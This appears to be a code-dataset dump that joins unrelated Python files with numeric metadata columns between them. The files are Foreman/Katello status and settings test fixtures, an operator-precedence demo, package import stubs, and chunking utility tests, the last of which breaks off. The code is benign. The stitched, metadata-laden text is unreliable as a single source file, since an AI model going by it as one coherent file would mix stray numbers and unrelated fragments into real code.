| 0
| 0
| 0.022461
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037975
| false
| 0.012658
| 0.007595
| 0
| 0.096203
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1b60cf095623bc5ad388640ead31affce2bc547
| 24,502
|
py
|
Python
|
tests/constants.py
|
adamruzicka/receptor-satellite-1
|
5479ab5cf1d9fc1353190f9122993caeec44ee61
|
[
"Apache-2.0"
] | 2
|
2020-02-27T18:47:16.000Z
|
2020-03-03T14:01:01.000Z
|
tests/constants.py
|
adamruzicka/receptor-satellite-1
|
5479ab5cf1d9fc1353190f9122993caeec44ee61
|
[
"Apache-2.0"
] | 9
|
2020-06-17T10:55:16.000Z
|
2021-02-19T15:29:16.000Z
|
tests/constants.py
|
adamruzicka/receptor-satellite-1
|
5479ab5cf1d9fc1353190f9122993caeec44ee61
|
[
"Apache-2.0"
] | 1
|
2020-02-17T21:47:47.000Z
|
2020-02-17T21:47:47.000Z
|
import json
__all__ = [
"PLUGIN_CONFIG",
"UUID",
"BAD_UUID",
"UUID_URL",
"STATUSES_URL",
"MISSING_UUID_RESPONSE_BODY",
"UUID_RESPONSE_BODY",
"STATUSES_RESPONSE_BODY",
"NO_ANSIBLE_STATUSES_RESPONSE_BODY",
"NO_CAPSULES_STATUSES_RESPONSE_BODY",
"DOWN_CAPSULE_STATUSES_RESPONSE_BODY",
]
PLUGIN_CONFIG = dict(
username="username", password="password", url="http://localhost", ca_file=None
)
UUID = "dd77f17a-2fe1-4f7a-b220-58f4140a1f9e"
BAD_UUID = "1"
UUID_URL = f"{PLUGIN_CONFIG['url']}/api/settings?search=name%20%3D%20instance_id"
STATUSES_URL = f"{PLUGIN_CONFIG['url']}/api/statuses"
MISSING_UUID_RESPONSE_BODY = json.dumps(
{
"total": 230,
"subtotal": 0,
"page": 1,
"per_page": 20,
"search": "name = instance_id",
"sort": {"by": None, "order": None},
"results": [],
}
)
UUID_RESPONSE_BODY = json.dumps(
{
"total": 230,
"subtotal": 1,
"page": 1,
"per_page": 20,
"search": "name = instance_id",
"sort": {"by": None, "order": None},
"results": [
{
"value": UUID,
"description": "Foreman instance ID, uniquely identifies this Foreman instance.",
"category": "Setting::General",
"settings_type": "string",
"default": "uuid",
"created_at": "2019-11-18 11:51:49 UTC",
"updated_at": "2019-11-18 11:51:49 UTC",
"id": 128,
"name": "instance_id",
"full_name": "Foreman UUID",
"category_name": "General",
}
],
}
)
STATUSES_RESPONSE_BODY = json.dumps(
{
"results": {
"foreman": {
"version": "1.24.0",
"api": {"version": "v2"},
"plugins": [
"Foreman plugin: foreman-tasks, 0.17.5, Ivan Ne\u010das, The goal of this plugin is to unify the way of showing task statuses across the Foreman instance.\nIt defines Task model for keeping the information about the tasks and Lock for assigning the tasks\nto resources. The locking allows dealing with preventing multiple colliding tasks to be run on the\nsame resource. It also optionally provides Dynflow infrastructure for using it for managing the tasks.\n",
"Foreman plugin: foreman_ansible, 4.0.3, Daniel Lobato Garcia, Ansible integration with Foreman",
"Foreman plugin: foreman_bootdisk, 16.0.0, Dominic Cleal, Plugin for Foreman that creates iPXE-based boot disks to provision hosts without the need for PXE infrastructure.",
"Foreman plugin: foreman_discovery, 16.0.1, Aditi Puntambekar, alongoldboim, Alon Goldboim, amirfefer, Amit Karsale, Amos Benari, Avi Sharvit, Bryan Kearney, bshuster, Daniel Lobato, Daniel Lobato Garcia, Daniel Lobato Garc\u00eda, Danny Smit, David Davis, Djebran Lezzoum, Dominic Cleal, Eric D. Helms, Ewoud Kohl van Wijngaarden, Frank Wall, Greg Sutcliffe, ChairmanTubeAmp, Ido Kanner, imriz, Imri Zvik, Ivan Ne\u010das, Joseph Mitchell Magen, June Zhang, kgaikwad, Lars Berntzon, ldjebran, Lukas Zapletal, Luk\u00e1\u0161 Zapletal, Marek Hulan, Marek Hul\u00e1n, Martin Ba\u010dovsk\u00fd, Matt Jarvis, Michael Moll, Nick, odovzhenko, Ohad Levy, Ondrej Prazak, Ond\u0159ej Ezr, Ori Rabin, orrabin, Partha Aji, Petr Chalupa, Phirince Philip, Rahul Bajaj, Robert Antoni Buj Gelonch, Scubafloyd, Sean O\\'Keeffe, Sebastian Gra\u0308\u00dfl, Shimon Shtein, Shlomi Zadok, Stephen Benjamin, Swapnil Abnave, Thomas Gelf, Timo Goebel, Tomas Strych, Tom Caspy, Tomer Brisker, and Yann C\u00e9zard, MaaS Discovery Plugin engine for Foreman",
"Foreman plugin: foreman_hooks, 0.3.15, Dominic Cleal, Plugin engine for Foreman that enables running custom hook scripts on Foreman events",
"Foreman plugin: foreman_inventory_upload, 1.0.2, Inventory upload team, Foreman plugin that process & upload data to cloud based host inventory",
"Foreman plugin: foreman_openscap, 2.0.2, slukasik@redhat.com, Foreman plug-in for managing security compliance reports",
"Foreman plugin: foreman_remote_execution, 2.0.6, Foreman Remote Execution team, A plugin bringing remote execution to the Foreman, completing the config management functionality with remote management functionality.",
"Foreman plugin: foreman_templates, 7.0.5, Greg Sutcliffe, Engine to synchronise provisioning templates from GitHub",
"Foreman plugin: foreman_theme_satellite, 5.0.1.5, Alon Goldboim, Shimon Stein, Theme changes for Satellite 6.",
"Foreman plugin: foreman_virt_who_configure, 0.5.0, Foreman virt-who-configure team, A plugin to make virt-who configuration easy",
"Foreman plugin: katello, 3.14.0.1, N/A, Katello adds Content and Subscription Management to Foreman. For this it relies on Candlepin and Pulp.",
"Foreman plugin: redhat_access, 2.2.8, Lindani Phiri, This plugin adds Red Hat Access knowledge base search, case management and diagnostics to Foreman",
],
"smart_proxies": [
{
"name": "foreman-nuc1.usersys.redhat.com",
"status": "ok",
"duration_ms": "138",
"version": "1.24.0",
"features": {
"pulp": "1.5.0",
"dynflow": "0.2.4",
"ansible": "3.0.1",
"discovery": "1.0.5",
"openscap": "0.7.2",
"ssh": "0.2.1",
"dns": "1.24.0",
"templates": "1.24.0",
"tftp": "1.24.0",
"dhcp": "1.24.0",
"puppetca": "1.24.0",
"puppet": "1.24.0",
"logs": "1.24.0",
"httpboot": "1.24.0",
},
"failed_features": {},
}
],
"compute_resources": [
{
"name": "libvirt",
"status": "ok",
"duration_ms": "85",
"errors": [],
}
],
"database": {"active": True, "duration_ms": "0"},
},
"katello": {
"version": "3.14.0.1",
"timeUTC": "2020-02-18 19:52:16 UTC",
"services": {
"pulp": {"status": "ok", "duration_ms": "31"},
"pulp_auth": {"status": "ok", "duration_ms": "16"},
"candlepin": {"status": "ok", "duration_ms": "10"},
"candlepin_auth": {"status": "ok", "duration_ms": "12"},
"foreman_tasks": {"status": "ok", "duration_ms": "3"},
"katello_events": {
"status": "ok",
"message": "0 Processed, 0 Failed",
"duration_ms": "0",
},
"candlepin_events": {
"status": "ok",
"message": "0 Processed, 0 Failed",
"duration_ms": "0",
},
},
"status": "ok",
},
}
}
)
NO_CAPSULES_STATUSES_RESPONSE_BODY = json.dumps(
{
"results": {
"foreman": {
"version": "1.24.0",
"api": {"version": "v2"},
"plugins": [
"Foreman plugin: foreman-tasks, 0.17.5, Ivan Ne\u010das, The goal of this plugin is to unify the way of showing task statuses across the Foreman instance.\nIt defines Task model for keeping the information about the tasks and Lock for assigning the tasks\nto resources. The locking allows dealing with preventing multiple colliding tasks to be run on the\nsame resource. It also optionally provides Dynflow infrastructure for using it for managing the tasks.\n",
"Foreman plugin: foreman_ansible, 4.0.3, Daniel Lobato Garcia, Ansible integration with Foreman",
"Foreman plugin: foreman_bootdisk, 16.0.0, Dominic Cleal, Plugin for Foreman that creates iPXE-based boot disks to provision hosts without the need for PXE infrastructure.",
"Foreman plugin: foreman_discovery, 16.0.1, Aditi Puntambekar, alongoldboim, Alon Goldboim, amirfefer, Amit Karsale, Amos Benari, Avi Sharvit, Bryan Kearney, bshuster, Daniel Lobato, Daniel Lobato Garcia, Daniel Lobato Garc\u00eda, Danny Smit, David Davis, Djebran Lezzoum, Dominic Cleal, Eric D. Helms, Ewoud Kohl van Wijngaarden, Frank Wall, Greg Sutcliffe, ChairmanTubeAmp, Ido Kanner, imriz, Imri Zvik, Ivan Ne\u010das, Joseph Mitchell Magen, June Zhang, kgaikwad, Lars Berntzon, ldjebran, Lukas Zapletal, Luk\u00e1\u0161 Zapletal, Marek Hulan, Marek Hul\u00e1n, Martin Ba\u010dovsk\u00fd, Matt Jarvis, Michael Moll, Nick, odovzhenko, Ohad Levy, Ondrej Prazak, Ond\u0159ej Ezr, Ori Rabin, orrabin, Partha Aji, Petr Chalupa, Phirince Philip, Rahul Bajaj, Robert Antoni Buj Gelonch, Scubafloyd, Sean O\\'Keeffe, Sebastian Gra\u0308\u00dfl, Shimon Shtein, Shlomi Zadok, Stephen Benjamin, Swapnil Abnave, Thomas Gelf, Timo Goebel, Tomas Strych, Tom Caspy, Tomer Brisker, and Yann C\u00e9zard, MaaS Discovery Plugin engine for Foreman",
"Foreman plugin: foreman_hooks, 0.3.15, Dominic Cleal, Plugin engine for Foreman that enables running custom hook scripts on Foreman events",
"Foreman plugin: foreman_inventory_upload, 1.0.2, Inventory upload team, Foreman plugin that process & upload data to cloud based host inventory",
"Foreman plugin: foreman_openscap, 2.0.2, slukasik@redhat.com, Foreman plug-in for managing security compliance reports",
"Foreman plugin: foreman_remote_execution, 2.0.6, Foreman Remote Execution team, A plugin bringing remote execution to the Foreman, completing the config management functionality with remote management functionality.",
"Foreman plugin: foreman_templates, 7.0.5, Greg Sutcliffe, Engine to synchronise provisioning templates from GitHub",
"Foreman plugin: foreman_theme_satellite, 5.0.1.5, Alon Goldboim, Shimon Stein, Theme changes for Satellite 6.",
"Foreman plugin: foreman_virt_who_configure, 0.5.0, Foreman virt-who-configure team, A plugin to make virt-who configuration easy",
"Foreman plugin: katello, 3.14.0.1, N/A, Katello adds Content and Subscription Management to Foreman. For this it relies on Candlepin and Pulp.",
"Foreman plugin: redhat_access, 2.2.8, Lindani Phiri, This plugin adds Red Hat Access knowledge base search, case management and diagnostics to Foreman",
],
"compute_resources": [
{
"name": "libvirt",
"status": "ok",
"duration_ms": "85",
"errors": [],
}
],
"database": {"active": True, "duration_ms": "0"},
},
"katello": {
"version": "3.14.0.1",
"timeUTC": "2020-02-18 19:52:16 UTC",
"services": {
"pulp": {"status": "ok", "duration_ms": "31"},
"pulp_auth": {"status": "ok", "duration_ms": "16"},
"candlepin": {"status": "ok", "duration_ms": "10"},
"candlepin_auth": {"status": "ok", "duration_ms": "12"},
"foreman_tasks": {"status": "ok", "duration_ms": "3"},
"katello_events": {
"status": "ok",
"message": "0 Processed, 0 Failed",
"duration_ms": "0",
},
"candlepin_events": {
"status": "ok",
"message": "0 Processed, 0 Failed",
"duration_ms": "0",
},
},
"status": "ok",
},
}
}
)
NO_ANSIBLE_STATUSES_RESPONSE_BODY = json.dumps(
{
"results": {
"foreman": {
"version": "1.24.0",
"api": {"version": "v2"},
"plugins": [
"Foreman plugin: foreman-tasks, 0.17.5, Ivan Ne\u010das, The goal of this plugin is to unify the way of showing task statuses across the Foreman instance.\nIt defines Task model for keeping the information about the tasks and Lock for assigning the tasks\nto resources. The locking allows dealing with preventing multiple colliding tasks to be run on the\nsame resource. It also optionally provides Dynflow infrastructure for using it for managing the tasks.\n",
"Foreman plugin: foreman_ansible, 4.0.3, Daniel Lobato Garcia, Ansible integration with Foreman",
"Foreman plugin: foreman_bootdisk, 16.0.0, Dominic Cleal, Plugin for Foreman that creates iPXE-based boot disks to provision hosts without the need for PXE infrastructure.",
"Foreman plugin: foreman_discovery, 16.0.1, Aditi Puntambekar, alongoldboim, Alon Goldboim, amirfefer, Amit Karsale, Amos Benari, Avi Sharvit, Bryan Kearney, bshuster, Daniel Lobato, Daniel Lobato Garcia, Daniel Lobato Garc\u00eda, Danny Smit, David Davis, Djebran Lezzoum, Dominic Cleal, Eric D. Helms, Ewoud Kohl van Wijngaarden, Frank Wall, Greg Sutcliffe, ChairmanTubeAmp, Ido Kanner, imriz, Imri Zvik, Ivan Ne\u010das, Joseph Mitchell Magen, June Zhang, kgaikwad, Lars Berntzon, ldjebran, Lukas Zapletal, Luk\u00e1\u0161 Zapletal, Marek Hulan, Marek Hul\u00e1n, Martin Ba\u010dovsk\u00fd, Matt Jarvis, Michael Moll, Nick, odovzhenko, Ohad Levy, Ondrej Prazak, Ond\u0159ej Ezr, Ori Rabin, orrabin, Partha Aji, Petr Chalupa, Phirince Philip, Rahul Bajaj, Robert Antoni Buj Gelonch, Scubafloyd, Sean O\\'Keeffe, Sebastian Gra\u0308\u00dfl, Shimon Shtein, Shlomi Zadok, Stephen Benjamin, Swapnil Abnave, Thomas Gelf, Timo Goebel, Tomas Strych, Tom Caspy, Tomer Brisker, and Yann C\u00e9zard, MaaS Discovery Plugin engine for Foreman",
"Foreman plugin: foreman_hooks, 0.3.15, Dominic Cleal, Plugin engine for Foreman that enables running custom hook scripts on Foreman events",
"Foreman plugin: foreman_inventory_upload, 1.0.2, Inventory upload team, Foreman plugin that process & upload data to cloud based host inventory",
"Foreman plugin: foreman_openscap, 2.0.2, slukasik@redhat.com, Foreman plug-in for managing security compliance reports",
"Foreman plugin: foreman_remote_execution, 2.0.6, Foreman Remote Execution team, A plugin bringing remote execution to the Foreman, completing the config management functionality with remote management functionality.",
"Foreman plugin: foreman_templates, 7.0.5, Greg Sutcliffe, Engine to synchronise provisioning templates from GitHub",
"Foreman plugin: foreman_theme_satellite, 5.0.1.5, Alon Goldboim, Shimon Stein, Theme changes for Satellite 6.",
"Foreman plugin: foreman_virt_who_configure, 0.5.0, Foreman virt-who-configure team, A plugin to make virt-who configuration easy",
"Foreman plugin: katello, 3.14.0.1, N/A, Katello adds Content and Subscription Management to Foreman. For this it relies on Candlepin and Pulp.",
"Foreman plugin: redhat_access, 2.2.8, Lindani Phiri, This plugin adds Red Hat Access knowledge base search, case management and diagnostics to Foreman",
],
"smart_proxies": [
{
"name": "foreman-nuc1.usersys.redhat.com",
"status": "ok",
"duration_ms": "138",
"version": "1.24.0",
"features": {
"pulp": "1.5.0",
"dynflow": "0.2.4",
"discovery": "1.0.5",
"openscap": "0.7.2",
"ssh": "0.2.1",
"dns": "1.24.0",
"templates": "1.24.0",
"tftp": "1.24.0",
"dhcp": "1.24.0",
"puppetca": "1.24.0",
"puppet": "1.24.0",
"logs": "1.24.0",
"httpboot": "1.24.0",
},
"failed_features": {},
}
],
"compute_resources": [
{
"name": "libvirt",
"status": "ok",
"duration_ms": "85",
"errors": [],
}
],
"database": {"active": True, "duration_ms": "0"},
},
"katello": {
"version": "3.14.0.1",
"timeUTC": "2020-02-18 19:52:16 UTC",
"services": {
"pulp": {"status": "ok", "duration_ms": "31"},
"pulp_auth": {"status": "ok", "duration_ms": "16"},
"candlepin": {"status": "ok", "duration_ms": "10"},
"candlepin_auth": {"status": "ok", "duration_ms": "12"},
"foreman_tasks": {"status": "ok", "duration_ms": "3"},
"katello_events": {
"status": "ok",
"message": "0 Processed, 0 Failed",
"duration_ms": "0",
},
"candlepin_events": {
"status": "ok",
"message": "0 Processed, 0 Failed",
"duration_ms": "0",
},
},
"status": "ok",
},
}
}
)
DOWN_CAPSULE_STATUSES_RESPONSE_BODY = json.dumps(
{
"results": {
"foreman": {
"version": "1.24.0",
"api": {"version": "v2"},
"plugins": [
"Foreman plugin: foreman-tasks, 0.17.5, Ivan Ne\u010das, The goal of this plugin is to unify the way of showing task statuses across the Foreman instance.\nIt defines Task model for keeping the information about the tasks and Lock for assigning the tasks\nto resources. The locking allows dealing with preventing multiple colliding tasks to be run on the\nsame resource. It also optionally provides Dynflow infrastructure for using it for managing the tasks.\n",
"Foreman plugin: foreman_ansible, 4.0.3, Daniel Lobato Garcia, Ansible integration with Foreman",
"Foreman plugin: foreman_bootdisk, 16.0.0, Dominic Cleal, Plugin for Foreman that creates iPXE-based boot disks to provision hosts without the need for PXE infrastructure.",
"Foreman plugin: foreman_discovery, 16.0.1, Aditi Puntambekar, alongoldboim, Alon Goldboim, amirfefer, Amit Karsale, Amos Benari, Avi Sharvit, Bryan Kearney, bshuster, Daniel Lobato, Daniel Lobato Garcia, Daniel Lobato Garc\u00eda, Danny Smit, David Davis, Djebran Lezzoum, Dominic Cleal, Eric D. Helms, Ewoud Kohl van Wijngaarden, Frank Wall, Greg Sutcliffe, ChairmanTubeAmp, Ido Kanner, imriz, Imri Zvik, Ivan Ne\u010das, Joseph Mitchell Magen, June Zhang, kgaikwad, Lars Berntzon, ldjebran, Lukas Zapletal, Luk\u00e1\u0161 Zapletal, Marek Hulan, Marek Hul\u00e1n, Martin Ba\u010dovsk\u00fd, Matt Jarvis, Michael Moll, Nick, odovzhenko, Ohad Levy, Ondrej Prazak, Ond\u0159ej Ezr, Ori Rabin, orrabin, Partha Aji, Petr Chalupa, Phirince Philip, Rahul Bajaj, Robert Antoni Buj Gelonch, Scubafloyd, Sean O\\'Keeffe, Sebastian Gra\u0308\u00dfl, Shimon Shtein, Shlomi Zadok, Stephen Benjamin, Swapnil Abnave, Thomas Gelf, Timo Goebel, Tomas Strych, Tom Caspy, Tomer Brisker, and Yann C\u00e9zard, MaaS Discovery Plugin engine for Foreman",
"Foreman plugin: foreman_hooks, 0.3.15, Dominic Cleal, Plugin engine for Foreman that enables running custom hook scripts on Foreman events",
"Foreman plugin: foreman_inventory_upload, 1.0.2, Inventory upload team, Foreman plugin that process & upload data to cloud based host inventory",
"Foreman plugin: foreman_openscap, 2.0.2, slukasik@redhat.com, Foreman plug-in for managing security compliance reports",
"Foreman plugin: foreman_remote_execution, 2.0.6, Foreman Remote Execution team, A plugin bringing remote execution to the Foreman, completing the config management functionality with remote management functionality.",
"Foreman plugin: foreman_templates, 7.0.5, Greg Sutcliffe, Engine to synchronise provisioning templates from GitHub",
"Foreman plugin: foreman_theme_satellite, 5.0.1.5, Alon Goldboim, Shimon Stein, Theme changes for Satellite 6.",
"Foreman plugin: foreman_virt_who_configure, 0.5.0, Foreman virt-who-configure team, A plugin to make virt-who configuration easy",
"Foreman plugin: katello, 3.14.0.1, N/A, Katello adds Content and Subscription Management to Foreman. For this it relies on Candlepin and Pulp.",
"Foreman plugin: redhat_access, 2.2.8, Lindani Phiri, This plugin adds Red Hat Access knowledge base search, case management and diagnostics to Foreman",
],
"smart_proxies": [
{
"name": "foreman-nuc1.usersys.redhat.com",
"status": "error",
"duration_ms": "138",
"version": "1.24.0",
"features": {
"pulp": "1.5.0",
"dynflow": "0.2.4",
"ansible": "3.0.1",
"discovery": "1.0.5",
"openscap": "0.7.2",
"ssh": "0.2.1",
"dns": "1.24.0",
"templates": "1.24.0",
"tftp": "1.24.0",
"dhcp": "1.24.0",
"puppetca": "1.24.0",
"puppet": "1.24.0",
"logs": "1.24.0",
"httpboot": "1.24.0",
},
"failed_features": {},
}
],
"compute_resources": [
{
"name": "libvirt",
"status": "ok",
"duration_ms": "85",
"errors": [],
}
],
"database": {"active": True, "duration_ms": "0"},
},
"katello": {
"version": "3.14.0.1",
"timeUTC": "2020-02-18 19:52:16 UTC",
"services": {
"pulp": {"status": "ok", "duration_ms": "31"},
"pulp_auth": {"status": "ok", "duration_ms": "16"},
"candlepin": {"status": "ok", "duration_ms": "10"},
"candlepin_auth": {"status": "ok", "duration_ms": "12"},
"foreman_tasks": {"status": "ok", "duration_ms": "3"},
"katello_events": {
"status": "ok",
"message": "0 Processed, 0 Failed",
"duration_ms": "0",
},
"candlepin_events": {
"status": "ok",
"message": "0 Processed, 0 Failed",
"duration_ms": "0",
},
},
"status": "ok",
},
}
}
)
| 68.250696
| 1,055
| 0.547098
| 2,673
| 24,502
| 4.941265
| 0.14104
| 0.055118
| 0.066626
| 0.035433
| 0.962523
| 0.95374
| 0.950409
| 0.950409
| 0.941323
| 0.941323
| 0
| 0.046085
| 0.343768
| 24,502
| 358
| 1,056
| 68.441341
| 0.775359
| 0
| 0
| 0.707042
| 0
| 0.135211
| 0.633173
| 0.032038
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.002817
| 0.002817
| 0
| 0.002817
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
62cd399ed2ee690e4c441e0a6e729192b7471332
| 648
|
py
|
Python
|
precedence.py
|
theGreenJedi/practicepy
|
330da97b0c79c3c8792ebb4166ecf2609545e127
|
[
"MIT"
] | null | null | null |
precedence.py
|
theGreenJedi/practicepy
|
330da97b0c79c3c8792ebb4166ecf2609545e127
|
[
"MIT"
] | null | null | null |
precedence.py
|
theGreenJedi/practicepy
|
330da97b0c79c3c8792ebb4166ecf2609545e127
|
[
"MIT"
] | null | null | null |
a = 2
b = 4
c = 8
print( '\nDefault Order:\t' , a , '*' , c ,'+' , b , '=' , a * c + b )
print( 'Forced Order:\t' , a , '* (' , c ,'+' , b , ') =' , a * ( c + b ) )
print( '\nDefault Order:\t' , c , '//' , b , '-' , a , '=' , c // b - a )
print( 'Forced Order:\t' , c , '// (' , b ,'-' ,a , ') =' , c // ( b - a ) )
print( '\nDefault Order:\t' , c , '%' , a , '+' , b , '=' , c % a + b )
print( 'Forced Order:\t' , c , '% (' , a , '+' , b , ') =' , c % ( a + b ) )
print( '\nDefault Order:\t' , c , '**' , a , '+' , b , '=' , c ** a + b )
print( 'Forced Order:\t' , c , '** (' , a , '+' , b , ') =' , c ** ( a + b ) )
| 38.117647
| 80
| 0.305556
| 87
| 648
| 2.287356
| 0.137931
| 0.241206
| 0.120603
| 0.38191
| 0.899497
| 0.839196
| 0.798995
| 0.798995
| 0.798995
| 0.482412
| 0
| 0.007109
| 0.348765
| 648
| 16
| 81
| 40.5
| 0.462085
| 0
| 0
| 0
| 0
| 0
| 0.279365
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.727273
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
c5355b21dd4f4f1c8596499d3596cc4d68b11e26
| 182
|
py
|
Python
|
flashsale/models/__init__.py
|
comecsoftdev/public_python_flashsale_simple_repo
|
48bf2ce13e306091cb5ab60383ae475678e82605
|
[
"MIT"
] | 1
|
2022-02-22T07:31:03.000Z
|
2022-02-22T07:31:03.000Z
|
flashsale/models/__init__.py
|
comecsoftdev/public_python_flashsale_simple_repo
|
48bf2ce13e306091cb5ab60383ae475678e82605
|
[
"MIT"
] | null | null | null |
flashsale/models/__init__.py
|
comecsoftdev/public_python_flashsale_simple_repo
|
48bf2ce13e306091cb5ab60383ae475678e82605
|
[
"MIT"
] | null | null | null |
from flashsale.models import basic_data
from flashsale.models import store
from flashsale.models import product
from flashsale.models import review
from flashsale.models import push
| 30.333333
| 39
| 0.862637
| 26
| 182
| 6
| 0.384615
| 0.416667
| 0.608974
| 0.801282
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10989
| 182
| 5
| 40
| 36.4
| 0.962963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c5635e0e432689b734545d19f97091d19f4c02a1
| 92
|
py
|
Python
|
my_project/my_project/offer/views/__init__.py
|
Govedarski/World-of-books
|
d270b72600a7986387a277dbe01ac8c6d747f662
|
[
"MIT"
] | null | null | null |
my_project/my_project/offer/views/__init__.py
|
Govedarski/World-of-books
|
d270b72600a7986387a277dbe01ac8c6d747f662
|
[
"MIT"
] | null | null | null |
my_project/my_project/offer/views/__init__.py
|
Govedarski/World-of-books
|
d270b72600a7986387a277dbe01ac8c6d747f662
|
[
"MIT"
] | null | null | null |
from my_project.offer.views.cb_views import *
from my_project.offer.views.fb_views import *
| 30.666667
| 45
| 0.826087
| 16
| 92
| 4.5
| 0.5
| 0.166667
| 0.361111
| 0.5
| 0.638889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 92
| 2
| 46
| 46
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c56546dbbc50b772ad5efca9285eaf64855e4895
| 3,272
|
py
|
Python
|
tests/test_py_chunk.py
|
movermeyer/nicedjango
|
c38ada1e50efb5ef0874ef063074b621579c2954
|
[
"MIT"
] | 1
|
2016-10-18T18:40:45.000Z
|
2016-10-18T18:40:45.000Z
|
tests/test_py_chunk.py
|
movermeyer/nicedjango
|
c38ada1e50efb5ef0874ef063074b621579c2954
|
[
"MIT"
] | null | null | null |
tests/test_py_chunk.py
|
movermeyer/nicedjango
|
c38ada1e50efb5ef0874ef063074b621579c2954
|
[
"MIT"
] | 1
|
2018-03-05T01:21:23.000Z
|
2018-03-05T01:21:23.000Z
|
from nicedjango.utils.py.chunk import as_chunks, sliceable_as_chunks
from nicedjango.utils.py.iter import map_attr
def test_as_chunks_unsized():
iterable = iter([1, 2, 3, 4, 5, 6, 7, 8, 9])
chunks = list(as_chunks(iterable, 4))
assert [[1, 2, 3, 4], [5, 6, 7, 8], [9]] == chunks
assert [1, 2, 3] == list(map_attr(chunks, 'cpos'))
assert [0, 0, 0] == list(map_attr(chunks, 'csize'))
assert [1, 5, 9] == list(map_attr(chunks, 'pos'))
assert [4, 8, 9] == list(map_attr(chunks, 'to_pos'))
assert [0, 0, 0] == list(map_attr(chunks, 'size'))
assert [4, 4, 1] == list(map_attr(chunks, 'len'))
def test_as_chunks_sized():
iterable = [1, 2, 3, 4, 5, 6, 7, 8, 9]
chunks = list(as_chunks(iterable, 4))
assert [[1, 2, 3, 4], [5, 6, 7, 8], [9]] == chunks
assert [1, 2, 3] == list(map_attr(chunks, 'cpos'))
assert [3, 3, 3] == list(map_attr(chunks, 'csize'))
assert [1, 5, 9] == list(map_attr(chunks, 'pos'))
assert [4, 8, 9] == list(map_attr(chunks, 'to_pos'))
assert [9, 9, 9] == list(map_attr(chunks, 'size'))
assert [4, 4, 1] == list(map_attr(chunks, 'len'))
def test_sliceable_as_chunks():
iterable = [1, 2, 3, 4, 5, 6, 7, 8, 9]
chunks = list(sliceable_as_chunks(iterable, 4))
assert [[1, 2, 3, 4], [5, 6, 7, 8], [9]] == chunks
assert [1, 2, 3] == list(map_attr(chunks, 'cpos'))
assert [0, 0, 0] == list(map_attr(chunks, 'csize'))
assert [1, 5, 9] == list(map_attr(chunks, 'pos'))
assert [4, 8, 9] == list(map_attr(chunks, 'to_pos'))
assert [0, 0, 0] == list(map_attr(chunks, 'size'))
assert [4, 4, 1] == list(map_attr(chunks, 'len'))
def test_as_chunks_chunk_value():
iterable = [1, 2, 3, 4, 5, 6, 7, 8, 9]
chunks = list(as_chunks(iterable, 4, chunk_value=lambda vs: map(str, vs)))
assert [['1', '2', '3', '4'], ['5', '6', '7', '8'], ['9']] == chunks
def test_sliceable_as_chunks_chunk_value():
iterable = [1, 2, 3, 4, 5, 6, 7, 8, 9]
chunks = list(sliceable_as_chunks(iterable, 4, chunk_value=lambda vs: map(str, vs)))
assert [['1', '2', '3', '4'], ['5', '6', '7', '8'], ['9']] == chunks
def test_as_chunks_key():
iterable = [1, 2, 3, 4, 5, 6, 7, 8, 9]
chunks = list(as_chunks(iterable, 4, key=lambda v: v % 4 == 0))
assert [[1, 2, 3], [4], [5, 6, 7], [8], [9]] == chunks
assert [1, 2, 3, 4, 5] == list(map_attr(chunks, 'cpos'))
assert [3, 3, 4, 4, 5] == list(map_attr(chunks, 'csize'))
assert [1, 4, 5, 8, 9] == list(map_attr(chunks, 'pos'))
assert [3, 4, 7, 8, 9] == list(map_attr(chunks, 'to_pos'))
assert [9, 9, 9, 9, 9] == list(map_attr(chunks, 'size'))
assert [3, 1, 3, 1, 1] == list(map_attr(chunks, 'len'))
def test_sliceable_as_chunks_key():
iterable = [1, 2, 3, 4, 5, 6, 7, 8, 9]
chunks = list(sliceable_as_chunks(iterable, 4, key=lambda v: v % 4 == 0))
assert [[1, 2, 3], [4], [5, 6, 7], [8], [9]] == chunks
assert [1, 2, 3, 4, 5] == list(map_attr(chunks, 'cpos'))
assert [0, 0, 0, 0, 0] == list(map_attr(chunks, 'csize'))
assert [1, 4, 5, 8, 9] == list(map_attr(chunks, 'pos'))
assert [3, 4, 7, 8, 9] == list(map_attr(chunks, 'to_pos'))
assert [0, 0, 0, 0, 0] == list(map_attr(chunks, 'size'))
